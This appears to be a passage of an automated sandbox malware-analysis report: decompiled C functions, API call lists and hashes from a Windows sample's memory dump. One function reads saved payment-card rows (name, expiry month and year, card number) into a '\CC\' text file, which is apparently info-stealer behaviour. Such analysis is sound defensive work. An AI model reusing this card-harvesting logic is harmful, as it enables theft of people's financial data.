                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,0043C8D8), ref: 0040F92F
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,0043C8D8), ref: 0040F94A
                                                                    • StrStrA.SHLWAPI(?,?,?,0043C8D8), ref: 0040F959
                                                                    • lstrlen.KERNEL32(?,?,0043C8D8), ref: 0040F974
                                                                    • StrStrA.SHLWAPI(00000003,?,?,0043C8D8), ref: 0040F988
                                                                    • lstrcatA.KERNEL32(0043C8DC,?,?,0043C8D8), ref: 0040F99A
                                                                    • lstrcatA.KERNEL32(?,?,0043C8D8), ref: 0040F9AC
                                                                    • lstrcatA.KERNEL32(?,?,?,0043C8D8), ref: 0040F9BB
                                                                    • lstrcatA.KERNEL32(0043C8DC,?,?,0043C8D8), ref: 0040F9C8
                                                                    • lstrcatA.KERNEL32(?,?,0043C8D8), ref: 0040F9DA
                                                                    • lstrcatA.KERNEL32(?,?,?,0043C8D8), ref: 0040F9E9
                                                                    • lstrcatA.KERNEL32(0043C8DC,?,?,0043C8D8), ref: 0040F9F6
                                                                    • StrStrA.SHLWAPI(-000000FE,?,?,0043C8D8), ref: 0040FA06
                                                                    • lstrlen.KERNEL32(?,?,0043C8D8), ref: 0040FA14
                                                                    • StrStrA.SHLWAPI(00000003,?,?,0043C8D8), ref: 0040FA28
                                                                    • lstrcatA.KERNEL32(?,?,0043C8D8), ref: 0040FA3F
                                                                      • Part of subcall function 0040E3F0: _memset.LIBCMT ref: 0040E42C
                                                                      • Part of subcall function 0040E3F0: lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,?,0040FA4D,?,?,0043C8D8), ref: 0040E441
                                                                      • Part of subcall function 0040E3F0: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040E449
                                                                      • Part of subcall function 0040E3F0: _memmove.LIBCMT ref: 0040E4A3
                                                                    • lstrcatA.KERNEL32(00000000,?,?,0043C8D8), ref: 0040FA54
                                                                    • lstrcatA.KERNEL32(0043C8DC,?,?,0043C8D8), ref: 0040FA61
                                                                    • StrStrA.SHLWAPI(-000000FE,?,?,0043C8D8), ref: 0040FA71
                                                                    • lstrlen.KERNEL32(?,?,0043C8D8), ref: 0040FA7F
                                                                    • StrStrA.SHLWAPI(00000003,?,?,0043C8D8), ref: 0040FA93
                                                                    • lstrcatA.KERNEL32(?,?,0043C8D8), ref: 0040FAAA
                                                                      • Part of subcall function 0040E3F0: lstrcatA.KERNEL32(0043C8D8,0043C8D8,?,00000000,00000000,00000000,?,0040FA4D,?,?,0043C8D8), ref: 0040E4B9
                                                                      • Part of subcall function 0040E3F0: lstrcatA.KERNEL32(0043C8D8,0043C8D8,?,00000000,?,00000001,?,?,00000000,00000000,00000000,?,0040FA4D,?,?,0043C8D8), ref: 0040E4CB
                                                                    • lstrcatA.KERNEL32(00000000,?,?,0043C8D8), ref: 0040FABF
                                                                    • lstrcatA.KERNEL32(0043EC3C,?,?,0043C8D8), ref: 0040FAD0
                                                                    • StrStrA.SHLWAPI(-000000FE,?,?,0043C8D8), ref: 0040FAE0
                                                                    • CloseHandle.KERNEL32(00000000,?,?,0043C8D8), ref: 0040FAF4
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$File$lstrlen$Pointer_memset$BinaryCloseCreateCryptHandleReadSizeString_memmove
                                                                    • String ID:
                                                                    • API String ID: 1742400647-0
                                                                    • Opcode ID: 41b4bcc266b924920a27a8305d041909113e43e930a514312cc39792c83f5768
                                                                    • Instruction ID: 1c81bb7b5987dfc72778c6097564e1838db67ca87947860856109f47b8ad0b3d
                                                                    • Opcode Fuzzy Hash: 41b4bcc266b924920a27a8305d041909113e43e930a514312cc39792c83f5768
                                                                    • Instruction Fuzzy Hash: 3861267A400508BFCF21AFA4EC4899EBF7AFB4B364B220139F50193171DB7549599F2A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040F094 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 185stringmemoryfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 59%
                                                                    			E0040F094(void* __ebx, CHAR* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t59;
				void* _t71;
				void* _t76;
				CHAR* _t80;
				void* _t81;
				CHAR* _t86;
				CHAR* _t87;
				CHAR* _t88;
				void* _t100;
				CHAR* _t101;
				CHAR* _t125;
				CHAR* _t128;
				void* _t129;
				void* _t130;
				void* _t133;
				void* _t134;
				void* _t136;

				_t136 = __eflags;
				E0042083E(E0043492B, __ebx, __edi, __esi);
				 *(_t129 - 0x248) =  *(_t129 + 8);
				 *(_t129 - 0x244) =  *(_t129 + 0xc);
				 *((intOrPtr*)(_t129 - 0x250)) =  *((intOrPtr*)(_t129 + 0x10));
				 *((intOrPtr*)(_t129 - 0x258)) =  *((intOrPtr*)(_t129 + 0x14));
				 *((intOrPtr*)(_t129 - 0x254)) =  *((intOrPtr*)(_t129 + 0x18));
				_t107 = 0;
				_t125 = __ecx;
				E00426300(_t129 - 0x118, 0, 0x104);
				lstrcatA(_t129 - 0x118,  *0x445fe0);
				_t59 = 0x1a;
				lstrcatA(_t129 - 0x118, E00415EF6(_t59, _t136));
				CopyFileA(_t125, _t129 - 0x118, 1);
				E00426300(_t129 - 0x220, 0, 0x104);
				wsprintfA(_t129 - 0x220, "\\CC\\%s_%s.txt",  *(_t129 - 0x244),  *(_t129 - 0x248));
				_t128 =  *0x445bf0; // 0x4c988e0
				_t71 =  *0x446248(_t129 - 0x118, _t129 - 0x24c, 0x250);
				_t133 = _t130 + 0x30;
				if(_t71 == 0) {
					_t76 =  *0x4461fc( *((intOrPtr*)(_t129 - 0x24c)), _t128, 0xffffffff, _t129 - 0x240, 0);
					_t134 = _t133 + 0x14;
					if(_t76 == 0) {
						_t80 = HeapAlloc(GetProcessHeap(), 0, 0xf423f);
						_t128 = _t80;
						_t81 =  *0x446218( *((intOrPtr*)(_t129 - 0x240)));
						_t139 = _t81 - 0x64;
						if(_t81 == 0x64) {
							_t125 = 0x43c8dc;
							while(1) {
								_t86 =  *0x446238( *((intOrPtr*)(_t129 - 0x240)), _t107);
								_t87 =  *0x446238( *((intOrPtr*)(_t129 - 0x240)), 1);
								 *(_t129 - 0x244) = _t87;
								_t88 =  *0x446238( *((intOrPtr*)(_t129 - 0x240)), 2);
								_t134 = _t134 + 0x18;
								 *(_t129 - 0x248) = _t88;
								lstrcatA(_t128, "Name: ");
								lstrcatA(_t128, _t86);
								lstrcatA(_t128, _t125);
								lstrcatA(_t128, "Month: ");
								lstrcatA(_t128,  *(_t129 - 0x244));
								lstrcatA(_t128, _t125);
								lstrcatA(_t128, "Year: ");
								lstrcatA(_t128,  *(_t129 - 0x248));
								lstrcatA(_t128, _t125);
								lstrcatA(_t128, "Card: ");
								_t100 =  *0x44622c( *((intOrPtr*)(_t129 - 0x240)), 3,  *0x446224( *((intOrPtr*)(_t129 - 0x240)), 3,  *((intOrPtr*)(_t129 - 0x250))));
								_t107 = _t129 - 0x23c;
								_t101 = E0040E874(_t129 - 0x23c,  *((intOrPtr*)(_t129 - 0x258)), _t100, _t125, _t128, _t139);
								 *(_t129 - 4) =  *(_t129 - 4) & 0x00000000;
								if(_t101[0x14] >= 0x10) {
									_t101 =  *_t101;
								}
								lstrcatA(_t128, _t101);
								 *(_t129 - 4) =  *(_t129 - 4) | 0xffffffff;
								E00404354(_t129 - 0x23c, 1, 0);
								lstrcatA(_t128, "\n\n");
								_push( *((intOrPtr*)(_t129 - 0x240)));
								if( *0x446218() != 0x64) {
									goto L8;
								}
								_t107 = 0;
								__eflags = 0;
							}
						}
						L8:
						E0041CE7C( *((intOrPtr*)(_t129 - 0x254)), _t129 - 0x220,  *0x446320(_t128), 3);
					}
					 *0x44621c( *((intOrPtr*)(_t129 - 0x240)));
					 *0x44624c( *((intOrPtr*)(_t129 - 0x24c)));
				}
				DeleteFileA(_t129 - 0x118);
				return E00420888(_t107, _t125, _t128);
			}




















                                                                    0x0040f094
                                                                    0x0040f09e
                                                                    0x0040f0a6
                                                                    0x0040f0af
                                                                    0x0040f0b8
                                                                    0x0040f0c1
                                                                    0x0040f0d0
                                                                    0x0040f0d6
                                                                    0x0040f0e0
                                                                    0x0040f0e2
                                                                    0x0040f0f7
                                                                    0x0040f0ff
                                                                    0x0040f10d
                                                                    0x0040f11d
                                                                    0x0040f12c
                                                                    0x0040f14c
                                                                    0x0040f152
                                                                    0x0040f166
                                                                    0x0040f16c
                                                                    0x0040f171
                                                                    0x0040f188
                                                                    0x0040f18e
                                                                    0x0040f193
                                                                    0x0040f1a6
                                                                    0x0040f1b2
                                                                    0x0040f1b4
                                                                    0x0040f1bb
                                                                    0x0040f1be
                                                                    0x0040f1c4
                                                                    0x0040f1cd
                                                                    0x0040f1d4
                                                                    0x0040f1e4
                                                                    0x0040f1f2
                                                                    0x0040f1f8
                                                                    0x0040f1fe
                                                                    0x0040f207
                                                                    0x0040f20d
                                                                    0x0040f215
                                                                    0x0040f21d
                                                                    0x0040f229
                                                                    0x0040f236
                                                                    0x0040f23e
                                                                    0x0040f24a
                                                                    0x0040f257
                                                                    0x0040f25f
                                                                    0x0040f26b
                                                                    0x0040f290
                                                                    0x0040f2a0
                                                                    0x0040f2a6
                                                                    0x0040f2ad
                                                                    0x0040f2b5
                                                                    0x0040f2b7
                                                                    0x0040f2b7
                                                                    0x0040f2bb
                                                                    0x0040f2c1
                                                                    0x0040f2cf
                                                                    0x0040f2da
                                                                    0x0040f2e0
                                                                    0x0040f2f0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040f1cb
                                                                    0x0040f1cb
                                                                    0x0040f1cb
                                                                    0x0040f1cd
                                                                    0x0040f2f6
                                                                    0x0040f30f
                                                                    0x0040f314
                                                                    0x0040f31d
                                                                    0x0040f32a
                                                                    0x0040f330
                                                                    0x0040f338
                                                                    0x0040f343

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0040F09E
                                                                    • _memset.LIBCMT ref: 0040F0E2
                                                                    • lstrcatA.KERNEL32(?,?,?,?), ref: 0040F0F7
                                                                      • Part of subcall function 00415EF6: _malloc.LIBCMT ref: 00415EFC
                                                                      • Part of subcall function 00415EF6: GetTickCount.KERNEL32 ref: 00415F07
                                                                      • Part of subcall function 00415EF6: _rand.LIBCMT ref: 00415F1C
                                                                      • Part of subcall function 00415EF6: wsprintfA.USER32 ref: 00415F2F
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040F10D
                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040F11D
                                                                    • _memset.LIBCMT ref: 0040F12C
                                                                    • wsprintfA.USER32 ref: 0040F14C
                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040F19F
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040F1A6
                                                                    • lstrcatA.KERNEL32(00000000,Name: ), ref: 0040F20D
                                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 0040F215
                                                                    • lstrcatA.KERNEL32(00000000,0043C8DC), ref: 0040F21D
                                                                    • lstrcatA.KERNEL32(00000000,Month: ), ref: 0040F229
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040F236
                                                                    • lstrcatA.KERNEL32(00000000,0043C8DC), ref: 0040F23E
                                                                    • lstrcatA.KERNEL32(00000000,Year: ), ref: 0040F24A
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040F257
                                                                    • lstrcatA.KERNEL32(00000000,0043C8DC), ref: 0040F25F
                                                                    • lstrcatA.KERNEL32(00000000,Card: ), ref: 0040F26B
                                                                      • Part of subcall function 0040E874: __EH_prolog3_GS.LIBCMT ref: 0040E87B
                                                                      • Part of subcall function 0040E874: _memset.LIBCMT ref: 0040E8C9
                                                                      • Part of subcall function 0040E874: LocalAlloc.KERNEL32 ref: 0040E904
                                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 0040F2BB
                                                                    • lstrcatA.KERNEL32(00000000,0043EC3C,00000001,00000000), ref: 0040F2DA
                                                                    • lstrlen.KERNEL32(00000000), ref: 0040F2F7
                                                                    • DeleteFileA.KERNEL32(?), ref: 0040F338
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$_memset$AllocFileH_prolog3_Heapwsprintf$CopyCountDeleteLocalProcessTick_malloc_randlstrlen
                                                                    • String ID: Card: $Month: $Name: $Year: $\CC\%s_%s.txt
                                                                    • API String ID: 2374201135-921702500
                                                                    • Opcode ID: d9b6252a99525faf56d81f1c89531e1be0a9a5569d6b11b13fddd8b29ba23a27
                                                                    • Instruction ID: 3446a684050c226e41bd7e93b1e1de0f12db2be70c4aa8d308090059b4190f6b
                                                                    • Opcode Fuzzy Hash: d9b6252a99525faf56d81f1c89531e1be0a9a5569d6b11b13fddd8b29ba23a27
                                                                    • Instruction Fuzzy Hash: BE612176901118AFCF21AB64EC4DEDE7B78FF0A311F1100B6F609A2161DB759A848F69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00408CC5 Relevance: 40.8, APIs: 27, Instructions: 278stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 98%
                                                                    			E00408CC5(CHAR* __ecx, void* __edx) {
				signed int _v8;
				char _v1012;
				char _v2012;
				char _v3012;
				char _v4012;
				char _v5012;
				char _v6012;
				char _v7012;
				char _v8012;
				char _v9012;
				intOrPtr _v9016;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t74;
				char* _t76;
				char* _t77;
				char* _t78;
				char* _t79;
				char* _t80;
				char* _t81;
				char* _t82;
				char* _t83;
				char* _t84;
				signed char _t144;
				signed char _t146;
				char* _t147;
				char* _t148;
				char* _t149;
				char* _t150;
				char* _t151;
				char* _t152;
				char* _t153;
				char* _t154;
				char* _t155;
				void* _t165;
				void* _t166;
				void* _t167;
				void* _t168;
				void* _t169;
				void* _t170;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t179;
				void* _t180;
				void* _t181;
				char* _t184;
				char* _t186;
				void* _t188;
				void* _t189;
				intOrPtr _t191;
				signed int _t192;
				void* _t193;
				char* _t194;
				char* _t196;

				_t188 = __edx;
				E0042E300(0x2334);
				_t74 =  *0x443674; // 0x393162b1
				_v8 = _t74 ^ _t192;
				_t189 = 0x3e8;
				_t163 = __ecx;
				_t165 = 0x3e8;
				_t76 =  &_v7012;
				do {
					 *_t76 = 0;
					_t76 = _t76 + 1;
					_t165 = _t165 - 1;
				} while (_t165 != 0);
				_t166 = 0x3e8;
				_t77 =  &_v5012;
				do {
					 *_t77 = 0;
					_t77 = _t77 + 1;
					_t166 = _t166 - 1;
				} while (_t166 != 0);
				_t167 = 0x3e8;
				_t78 =  &_v6012;
				do {
					 *_t78 = 0;
					_t78 = _t78 + 1;
					_t167 = _t167 - 1;
				} while (_t167 != 0);
				_t168 = 0x3e8;
				_t79 =  &_v8012;
				do {
					 *_t79 = 0;
					_t79 = _t79 + 1;
					_t168 = _t168 - 1;
				} while (_t168 != 0);
				_t169 = 0x3e8;
				_t80 =  &_v9012;
				do {
					 *_t80 = 0;
					_t80 = _t80 + 1;
					_t169 = _t169 - 1;
				} while (_t169 != 0);
				_t170 = 0x3e8;
				_t81 =  &_v1012;
				do {
					 *_t81 = 0;
					_t81 = _t81 + 1;
					_t170 = _t170 - 1;
				} while (_t170 != 0);
				_t171 = 0x3e8;
				_t82 =  &_v3012;
				do {
					 *_t82 = 0;
					_t82 = _t82 + 1;
					_t171 = _t171 - 1;
				} while (_t171 != 0);
				_t172 = 0x3e8;
				_t83 =  &_v2012;
				do {
					 *_t83 = 0;
					_t83 = _t83 + 1;
					_t172 = _t172 - 1;
				} while (_t172 != 0);
				_t173 = 0x3e8;
				_t84 =  &_v4012;
				do {
					 *_t84 = 0;
					_t84 = _t84 + 1;
					_t173 = _t173 - 1;
				} while (_t173 != 0);
				lstrcatA( &_v7012,  *0x446118);
				lstrcatA( &_v5012,  *0x445cf8);
				lstrcatA( &_v6012,  *0x445f98);
				lstrcatA( &_v8012,  *0x445a8c);
				lstrcatA( &_v9012,  *0x445ea0);
				lstrcatA( &_v1012, _t163);
				lstrcatA( &_v1012, 0x43c8e0);
				lstrcatA( &_v1012,  &_v5012);
				lstrcatA( &_v1012, 0x43c8e0);
				lstrcatA( &_v1012,  &_v6012);
				lstrcatA( &_v1012, 0x43c8e0);
				lstrcatA( &_v1012,  &_v8012);
				lstrcatA( &_v3012, _t163);
				lstrcatA( &_v3012, 0x43c8e0);
				lstrcatA( &_v3012,  &_v5012);
				lstrcatA( &_v3012, 0x43c8e0);
				lstrcatA( &_v3012,  &_v6012);
				lstrcatA( &_v2012, _t163);
				lstrcatA( &_v2012, 0x43c8e0);
				lstrcatA( &_v2012,  &_v9012);
				lstrcatA( &_v2012, 0x43c8e0);
				lstrcatA( &_v2012,  &_v8012);
				lstrcatA( &_v4012, _t163);
				lstrcatA( &_v4012, 0x43c8e0);
				lstrcatA( &_v4012,  &_v9012);
				_t144 = GetFileAttributesA( &_v1012);
				_t191 = 0xf;
				if(_t144 != 0xffffffff && (_t144 & 0x00000010) == 0) {
					_t196 = _t193 - 0x1c;
					_t186 = _t196;
					 *(_t186 + 0x10) =  *(_t186 + 0x10) & 0x00000000;
					_v9016 = _t196;
					 *(_t186 + 0x14) = 0x43c8e0;
					_t163 =  &_v3012;
					 *_t186 = 0;
					E00404331(_t186,  &_v7012);
					E00408B15( &_v3012,  &_v3012, _t188, 0x3e8, _t191,  *(_t186 + 0x10));
					_t193 = _t196 + 0x1c;
				}
				_t146 = GetFileAttributesA( &_v2012);
				if(_t146 != 0xffffffff && (_t146 & 0x00000010) == 0) {
					_t194 = _t193 - 0x1c;
					_t184 = _t194;
					 *(_t184 + 0x10) =  *(_t184 + 0x10) & 0x00000000;
					_v9016 = _t194;
					 *((intOrPtr*)(_t184 + 0x14)) = _t191;
					_t163 =  &_v4012;
					 *_t184 = 0;
					E00404331(_t184,  &_v7012);
					E00408B15( &_v4012,  &_v4012, _t188, _t189, _t191,  *(_t184 + 0x10));
				}
				_t174 = _t189;
				_t147 =  &_v7012;
				do {
					 *_t147 = 0;
					_t147 = _t147 + 1;
					_t174 = _t174 - 1;
				} while (_t174 != 0);
				_t175 = _t189;
				_t148 =  &_v5012;
				do {
					 *_t148 = 0;
					_t148 = _t148 + 1;
					_t175 = _t175 - 1;
				} while (_t175 != 0);
				_t176 = _t189;
				_t149 =  &_v6012;
				do {
					 *_t149 = 0;
					_t149 = _t149 + 1;
					_t176 = _t176 - 1;
				} while (_t176 != 0);
				_t177 = _t189;
				_t150 =  &_v8012;
				do {
					 *_t150 = 0;
					_t150 = _t150 + 1;
					_t177 = _t177 - 1;
				} while (_t177 != 0);
				_t178 = _t189;
				_t151 =  &_v9012;
				do {
					 *_t151 = 0;
					_t151 = _t151 + 1;
					_t178 = _t178 - 1;
				} while (_t178 != 0);
				_t179 = _t189;
				_t152 =  &_v1012;
				do {
					 *_t152 = 0;
					_t152 = _t152 + 1;
					_t179 = _t179 - 1;
				} while (_t179 != 0);
				_t180 = _t189;
				_t153 =  &_v3012;
				do {
					 *_t153 = 0;
					_t153 = _t153 + 1;
					_t180 = _t180 - 1;
				} while (_t180 != 0);
				_t181 = _t189;
				_t154 =  &_v2012;
				do {
					 *_t154 = 0;
					_t154 = _t154 + 1;
					_t181 = _t181 - 1;
				} while (_t181 != 0);
				_t155 =  &_v4012;
				do {
					 *_t155 = 0;
					_t155 = _t155 + 1;
					_t189 = _t189 - 1;
				} while (_t189 != 0);
				return E0041DA9B(_t155, _t163, _v8 ^ _t192, _t188, _t189, _t191);
			}

































































                                                                    0x00408cc5
                                                                    0x00408ccd
                                                                    0x00408cd2
                                                                    0x00408cd9
                                                                    0x00408cdf
                                                                    0x00408ce4
                                                                    0x00408ce6
                                                                    0x00408ce8
                                                                    0x00408cee
                                                                    0x00408cee
                                                                    0x00408cf1
                                                                    0x00408cf2
                                                                    0x00408cf2
                                                                    0x00408cf5
                                                                    0x00408cf7
                                                                    0x00408cfd
                                                                    0x00408cfd
                                                                    0x00408d00
                                                                    0x00408d01
                                                                    0x00408d01
                                                                    0x00408d04
                                                                    0x00408d06
                                                                    0x00408d0c
                                                                    0x00408d0c
                                                                    0x00408d0f
                                                                    0x00408d10
                                                                    0x00408d10
                                                                    0x00408d13
                                                                    0x00408d15
                                                                    0x00408d1b
                                                                    0x00408d1b
                                                                    0x00408d1e
                                                                    0x00408d1f
                                                                    0x00408d1f
                                                                    0x00408d22
                                                                    0x00408d24
                                                                    0x00408d2a
                                                                    0x00408d2a
                                                                    0x00408d2d
                                                                    0x00408d2e
                                                                    0x00408d2e
                                                                    0x00408d31
                                                                    0x00408d33
                                                                    0x00408d39
                                                                    0x00408d39
                                                                    0x00408d3c
                                                                    0x00408d3d
                                                                    0x00408d3d
                                                                    0x00408d40
                                                                    0x00408d42
                                                                    0x00408d48
                                                                    0x00408d48
                                                                    0x00408d4b
                                                                    0x00408d4c
                                                                    0x00408d4c
                                                                    0x00408d4f
                                                                    0x00408d51
                                                                    0x00408d57
                                                                    0x00408d57
                                                                    0x00408d5a
                                                                    0x00408d5b
                                                                    0x00408d5b
                                                                    0x00408d5e
                                                                    0x00408d60
                                                                    0x00408d66
                                                                    0x00408d66
                                                                    0x00408d69
                                                                    0x00408d6a
                                                                    0x00408d6a
                                                                    0x00408d7a
                                                                    0x00408d8d
                                                                    0x00408da0
                                                                    0x00408db3
                                                                    0x00408dc6
                                                                    0x00408dd4
                                                                    0x00408de7
                                                                    0x00408dfb
                                                                    0x00408e09
                                                                    0x00408e1d
                                                                    0x00408e2b
                                                                    0x00408e3f
                                                                    0x00408e4d
                                                                    0x00408e5b
                                                                    0x00408e6f
                                                                    0x00408e7d
                                                                    0x00408e91
                                                                    0x00408e9f
                                                                    0x00408ead
                                                                    0x00408ec1
                                                                    0x00408ecf
                                                                    0x00408ee3
                                                                    0x00408ef1
                                                                    0x00408eff
                                                                    0x00408f13
                                                                    0x00408f20
                                                                    0x00408f28
                                                                    0x00408f2c
                                                                    0x00408f32
                                                                    0x00408f35
                                                                    0x00408f37
                                                                    0x00408f41
                                                                    0x00408f47
                                                                    0x00408f4b
                                                                    0x00408f51
                                                                    0x00408f54
                                                                    0x00408f5b
                                                                    0x00408f60
                                                                    0x00408f60
                                                                    0x00408f6a
                                                                    0x00408f73
                                                                    0x00408f79
                                                                    0x00408f7c
                                                                    0x00408f7e
                                                                    0x00408f88
                                                                    0x00408f8e
                                                                    0x00408f92
                                                                    0x00408f98
                                                                    0x00408f9b
                                                                    0x00408fa2
                                                                    0x00408fa7
                                                                    0x00408faa
                                                                    0x00408fac
                                                                    0x00408fb2
                                                                    0x00408fb2
                                                                    0x00408fb5
                                                                    0x00408fb6
                                                                    0x00408fb6
                                                                    0x00408fb9
                                                                    0x00408fbb
                                                                    0x00408fc1
                                                                    0x00408fc1
                                                                    0x00408fc4
                                                                    0x00408fc5
                                                                    0x00408fc5
                                                                    0x00408fc8
                                                                    0x00408fca
                                                                    0x00408fd0
                                                                    0x00408fd0
                                                                    0x00408fd3
                                                                    0x00408fd4
                                                                    0x00408fd4
                                                                    0x00408fd7
                                                                    0x00408fd9
                                                                    0x00408fdf
                                                                    0x00408fdf
                                                                    0x00408fe2
                                                                    0x00408fe3
                                                                    0x00408fe3
                                                                    0x00408fe6
                                                                    0x00408fe8
                                                                    0x00408fee
                                                                    0x00408fee
                                                                    0x00408ff1
                                                                    0x00408ff2
                                                                    0x00408ff2
                                                                    0x00408ff5
                                                                    0x00408ff7
                                                                    0x00408ffd
                                                                    0x00408ffd
                                                                    0x00409000
                                                                    0x00409001
                                                                    0x00409001
                                                                    0x00409004
                                                                    0x00409006
                                                                    0x0040900c
                                                                    0x0040900c
                                                                    0x0040900f
                                                                    0x00409010
                                                                    0x00409010
                                                                    0x00409013
                                                                    0x00409015
                                                                    0x0040901b
                                                                    0x0040901b
                                                                    0x0040901e
                                                                    0x0040901f
                                                                    0x0040901f
                                                                    0x00409022
                                                                    0x00409028
                                                                    0x00409028
                                                                    0x0040902b
                                                                    0x0040902c
                                                                    0x0040902c
                                                                    0x0040903d

                                                                    APIs
                                                                    • lstrcatA.KERNEL32(?), ref: 00408D7A
                                                                    • lstrcatA.KERNEL32(?), ref: 00408D8D
                                                                    • lstrcatA.KERNEL32(?), ref: 00408DA0
                                                                    • lstrcatA.KERNEL32(?), ref: 00408DB3
                                                                    • lstrcatA.KERNEL32(?), ref: 00408DC6
                                                                    • lstrcatA.KERNEL32(?), ref: 00408DD4
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00408DE7
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00408DFB
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00408E09
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00408E1D
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00408E2B
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00408E3F
                                                                    • lstrcatA.KERNEL32(?), ref: 00408E4D
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00408E5B
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00408E6F
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00408E7D
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00408E91
                                                                    • lstrcatA.KERNEL32(?), ref: 00408E9F
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00408EAD
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00408EC1
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00408ECF
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00408EE3
                                                                    • lstrcatA.KERNEL32(?), ref: 00408EF1
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00408EFF
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00408F13
                                                                    • GetFileAttributesA.KERNEL32(?), ref: 00408F20
                                                                    • GetFileAttributesA.KERNEL32(?), ref: 00408F6A
                                                                      • Part of subcall function 00408B15: __EH_prolog3_GS.LIBCMT ref: 00408B1F
                                                                      • Part of subcall function 00408B15: GetProcessHeap.KERNEL32(00000000,0098967F,00000570,00408FA7,?), ref: 00408B37
                                                                      • Part of subcall function 00408B15: HeapAlloc.KERNEL32(00000000), ref: 00408B3E
                                                                      • Part of subcall function 00408B15: wsprintfA.USER32 ref: 00408B59
                                                                      • Part of subcall function 00408B15: FindFirstFileA.KERNEL32(?,?), ref: 00408B70
                                                                      • Part of subcall function 00408B15: StrCmpCA.SHLWAPI(?,0043EAC4), ref: 00408B96
                                                                      • Part of subcall function 00408B15: StrCmpCA.SHLWAPI(?,0043EAC8), ref: 00408BB0
                                                                      • Part of subcall function 00408B15: wsprintfA.USER32 ref: 00408BD7
                                                                      • Part of subcall function 00408B15: lstrcatA.KERNEL32(?), ref: 00408BFB
                                                                      • Part of subcall function 00408B15: lstrcatA.KERNEL32(?,00000000), ref: 00408C11
                                                                      • Part of subcall function 00408B15: CopyFileA.KERNEL32(?,?,00000001), ref: 00408C27
                                                                      • Part of subcall function 00408B15: DeleteFileA.KERNEL32(?), ref: 00408C43
                                                                      • Part of subcall function 00408B15: FindNextFileA.KERNEL32(?,?), ref: 00408C56
                                                                      • Part of subcall function 00408B15: FindClose.KERNEL32(?), ref: 00408C6A
                                                                      • Part of subcall function 00408B15: _memset.LIBCMT ref: 00408C79
                                                                      • Part of subcall function 00408B15: lstrcatA.KERNEL32(?), ref: 00408C8E
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$File$Find$AttributesHeapwsprintf$AllocCloseCopyDeleteFirstH_prolog3_NextProcess_memset
                                                                    • String ID:
                                                                    • API String ID: 1902152991-0
                                                                    • Opcode ID: c81a09910405bd87e39942a975467373d73e6238d0610d6a6614170126663fe1
                                                                    • Instruction ID: 6c5f2112e7dd20d86226ab2040fd84824874cce3c12f39cf38b4b7984dd20594
                                                                    • Opcode Fuzzy Hash: c81a09910405bd87e39942a975467373d73e6238d0610d6a6614170126663fe1
                                                                    • Instruction Fuzzy Hash: 6EB191759001199FDF25DB64DC48AED7BBCEB1A315F0400EAF446E3291DB389B888F29
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004133B9 Relevance: 40.5, APIs: 12, Strings: 11, Instructions: 252stringmemoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 63%
                                                                    			E004133B9(void* __edx, intOrPtr* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v276;
				char _v540;
				char _v804;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t35;
